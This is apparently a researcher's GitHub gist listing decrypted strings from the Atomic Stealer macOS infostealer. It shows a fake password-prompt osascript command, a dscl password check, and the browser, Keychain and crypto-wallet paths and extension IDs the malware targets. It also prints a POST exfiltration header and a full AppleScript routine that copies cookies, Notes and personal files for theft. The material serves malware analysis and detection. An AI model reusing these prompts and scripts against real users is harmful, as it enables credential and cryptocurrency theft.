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Last active January 16, 2024 08:40
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  • Save RussianPanda95/c74ac42f58983d08ca50cedac960065a to your computer and use it in GitHub Desktop.
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Atomic Stealer decrypted strings
Decrypted string at address 0x1000224f2: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for
Decrypted string at LEA: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer' at 0x100022629
Decrypted string at address 0x10002278a:
Decrypted string at address 0x100022b9e: pwd
Decrypted string at address 0x10002aa3c: Chromium/
Decrypted string at address 0x10002ad8d: Profile
Decrypted string at address 0x10002c328: /cookies.sqlite
Decrypted string at address 0x10002c5cd: /formhistory.sqlite
Decrypted string at address 0x10002c872: /key4.db
Decrypted string at address 0x10002cb17: /logins.json
Decrypted string at address 0x10002e3ba: POST /p2p HTTP/1.1Host:
Decrypted string at address 0x10002e667: :80uuid:
Decrypted string at address 0x10002e8fa: 7bc8f87e-c842-47c7-8f05-10e2be357888
Decrypted string at address 0x10002eb8d: Content-Length:
Decrypted string at address 0x10002f942: USER
Decrypted string at address 0x10002fbc6: /Users/
Decrypted string at address 0x10002ffe4: /fg/
Decrypted string at address 0x10003027a: FileGrabber/
Decrypted string at address 0x10003054c: username
Decrypted string at address 0x1000307db: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
Decrypted string at address 0x100030a7d: user
Decrypted string at address 0x100030d18: /Library/Application Support/
Decrypted string at address 0x100030fab: /Library/Cookies/Cookies.binarycookies
Decrypted string at address 0x100031251: safari/saf1
Decrypted string at address 0x1000314ec: /.config/filezilla/recentservers.xml
Decrypted string at address 0x100031792: FileZilla/recentservers.xml
Decrypted string at address 0x100031a5b: Chrome
Decrypted string at address 0x100031d03: Google
Decrypted string at address 0x100031ffc: Brave
Decrypted string at address 0x1000322a4: BraveSoftware/Brave-Browser/
Decrypted string at address 0x10003259d: Edge
Decrypted string at address 0x100032842: Microsoft Edge/
Decrypted string at address 0x100032b3b: Opera
Decrypted string at address 0x100032de3: com.operasoftware.Opera/
Decrypted string at address 0x1000330dc: OperaGX
Decrypted string at address 0x100033384: com.operasoftware.OperaGX/
Decrypted string at address 0x10003367d: Vivaldi
Decrypted string at address 0x100033922: Vivaldi/
Decrypted string at address 0x10003467a: Firefox/Profiles/
Decrypted string at address 0x100034956: /Library/Keychains/login.keychain-db
Decrypted string at address 0x100034bfc: keychain
Decrypted string at address 0x100034e94: Binance/app-store.json
Decrypted string at address 0x10003513d: deskwallets/Binance/app-store.json
Decrypted string at address 0x100035409: deskwallets/Electrum/
Decrypted string at address 0x1000356ae: /.electrum/wallets/
Decrypted string at address 0x1000359aa: deskwallets/Coinomi/
Decrypted string at address 0x100035c52: Coinomi/wallets/
Decrypted string at address 0x100035f4b: deskwallets/Exodus/
Decrypted string at address 0x1000361f3: Exodus/
Decrypted string at address 0x1000364ec: deskwallets/Atomic/
Decrypted string at address 0x100036791: atomic/Local Storage/leveldb/
Decrypted string at address 0x1000372b1:
Decrypted string at address 0x1000439c1: .DS_Store
Decrypted string at address 0x100043c69: Partitions
Decrypted string at address 0x100043f0e: Code Cache
Decrypted string at address 0x1000447a1: /Cookies
Decrypted string at address 0x100044a46: /Network/Cookies
Decrypted string at address 0x100044ceb: /Login Data
Decrypted string at address 0x1000453a4: ibnejdfjmmkpcnlpebklmnkoeoihofec
Decrypted string at address 0x100045649: nkbihfbeogaeaoehlefnkodbefgpgknn
Decrypted string at address 0x1000458f1: bocpokimicclpaiekenaeelehdjllofo
Decrypted string at address 0x100045b96: nphplpgoakhhjchkkhmiggakijnkhfnd
Decrypted string at address 0x100045e3b: pocmplpaccanhmnllbbkpgfliimjljgo
Decrypted string at address 0x1000460e0: mfhbebgoclkghebffdldpobeajmbecfk
Decrypted string at address 0x100046385: fhilaheimglignddkjgofkcbgekhenbh
Decrypted string at address 0x10004662a: hnhobjmcibchnmglfbldbfabcgaknlkj
Decrypted string at address 0x1000468d2: apnehcjmnengpnmccpaibjmhhoadaico
Decrypted string at address 0x100046b7a: cjmkndjhnagcfbpiemnkdpomccnjblmj
Decrypted string at address 0x100046e22: cmndjbecilbocjfkibfbifhngkdmjgog
Decrypted string at address 0x1000470ca: pnndplcbkakcplkjnolgbkdgjikjednm
Decrypted string at address 0x10004736f: dhgnlgphgchebgoemcjekedjjbifijid
Decrypted string at address 0x100047617: fhbohimaelbohpjbbldcngcnapndodjp
Decrypted string at address 0x1000478bf: ffnbelfdoeiohenkjibnmadjiehjhajb
Decrypted string at address 0x100047b67: afbcbjpbpfadlkmhmclhkeeodmamcflc
Decrypted string at address 0x100047e0c: hnfanknocfeofbddgcijnmhnfnkdnaad
Decrypted string at address 0x1000480b4: hpglfhgfnhbgpjdenjgmdgoeiappafln
Decrypted string at address 0x100048359: cjelfplplebdjjenllpjcblmjkfcffne
Decrypted string at address 0x100048601: kncchdigobghenbbaddojjnnaogfppfj
Decrypted string at address 0x1000488a6: amkmjjmmflddogmhpjloimipbofnfjih
Decrypted string at address 0x100048b4e: nlbmnnijcnlegkjjpcfjclmcfggfefdm
Decrypted string at address 0x100048df3: ppdadbejkmjnefldpcdjhnkpbjkikoip
Decrypted string at address 0x10004909b: fnjhmkhhmkbjkkabndcnnogagogbneec
Decrypted string at address 0x100049340: cphhlgmgameodnhkjdmkpanlelnlohao
Decrypted string at address 0x1000495e8: nhnkbkgjikgcigadomkphalanndcapjk
Decrypted string at address 0x10004988d: kpfopkelmapcoipemfendmdcghnegimn
Decrypted string at address 0x100049b35: copjnifcecdedocejpaapepagaodgpbh
Decrypted string at address 0x100049ddd: aiifbnbfobpmeekipheeijimdpnlpgpp
Decrypted string at address 0x10004a082: dmkamcknogkgcdfhhbddcghachkejeap
Decrypted string at address 0x10004a32a: cnmamaachppnkjgnildpdmkaakejnhae
Decrypted string at address 0x10004a5d2: jojhfeoedkpkglbfimdfabpdfjaoolaf
Decrypted string at address 0x10004a877: flpiciilemghbmfalicajoolhkkenfel
Decrypted string at address 0x10004ab1c: nknhiehlklippafakaeklbeglecifhad
Decrypted string at address 0x10004adc4: hcflpincpppdclinealmandijcmnkbgn
Decrypted string at address 0x10004b069: ookjlbkiijinhpmnjffcofjonbfbgaoc
Decrypted string at address 0x10004b30e: mnfifefkajgofkcjkemidiaecocnkjeh
Decrypted string at address 0x10004b5b6: hmeobnfnfcmdkdcmlblgagmfpfboieaf
Decrypted string at address 0x10004b85b: dkdedlpgdmmkkfjabffeganieamfklkm
Decrypted string at address 0x10004bb00: nlgbhdfgdhgbiamfdfmbikcdghidoadd
Decrypted string at address 0x10004bda5: cihmoadaighcejopammfbmddcmdekcje
Decrypted string at address 0x10004c04d: lodccjjbdhfakaekdiahmedfbieldgik
Decrypted string at address 0x10004c2f2: bcopgchhojmggmffilplmbdicgaihlkp
Decrypted string at address 0x10004c59a: klnaejjgbibmhlephnhpmaofohgkpgkd
Decrypted string at address 0x10004c842: aeachknmefphepccionboohckonoeemg
Decrypted string at address 0x10004cae7: fnnegphlobjdpkhecapkijjdkgcjhkib
Decrypted string at address 0x10004cd8f: pdadjkfkgcafgbceimcpbkalnfnepbnk
Decrypted string at address 0x10004d034: acmacodkjbdgmoleeebolmdjonilkdbch
Decrypted string at address 0x10004d2dc: bfnaelmomeimhlpmgjnjophhpkkoljpa
Decrypted string at address 0x10004d581: cgeeodpfagjceefieflmdfphplkenlfk
Decrypted string at address 0x10004d829: imloifkgjagghnncjkhggdhalmcnfklk
Decrypted string at address 0x10004dace: aholpfdialjgjfhomihkjbmgjidlcdno
Decrypted string at address 0x10004dd76: egjidjbpglichdcondbcbdnbeeppgdph
Decrypted string at address 0x10004e01b: efbglgofoippbgcjepnhiblaibcnclgk
Decrypted string at address 0x10004e2c3: opcgpfmipidbgpenhmajoajpbobppdil
Decrypted string at address 0x10004e568: hifafgmccdpekplomjjkcfgodnhcellj
Decrypted string at address 0x10004e810: ojggmchlghnjlapmfbnjholfjkiidbch
Decrypted string at address 0x10004eab8: jnlgamecbpmbajjfhmmmlhejkemejdma
Decrypted string at address 0x10004ed60: dlcobpjiigpikoobohmabehhmhfoodbb
Decrypted string at address 0x10004f005: ebfidpplhabeedpnhjnobghokpiioolj
Decrypted string at address 0x10004f2ad: loinekcabhlmhjjbocijdoimmejangoa
Decrypted string at address 0x10004f555: ejjladinnckdgjemekebdpeokbikhfci
Decrypted string at address 0x10004f7fd: phkbamefinggmakgklpkljjmgibohnba
Decrypted string at address 0x10004faa5: ppbibelpcjmhbdihakflkdcoccbgbkpo
Decrypted string at address 0x100021efe: dscl . authonly "
Decrypted string at address 0x10002afee: Default
Decrypted string at address 0x10002b1fb: Snapshots
Decrypted string at address 0x10002dcf5: masterpass-chrome
Decrypted string at address 0x10003adbc: osascript -e 'tell application "Terminal" to close first window' & exit
Decrypted string at LEA: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:" set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"} set bankSize to 0 tell application "Finder" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:"fg"} end if set safariFolder to ((path to library folder from user domain as text) & "") try duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & "Library:Group" try set notesFolder to folder notesFolderPath set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder "Documents" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell' at 0x10004443c
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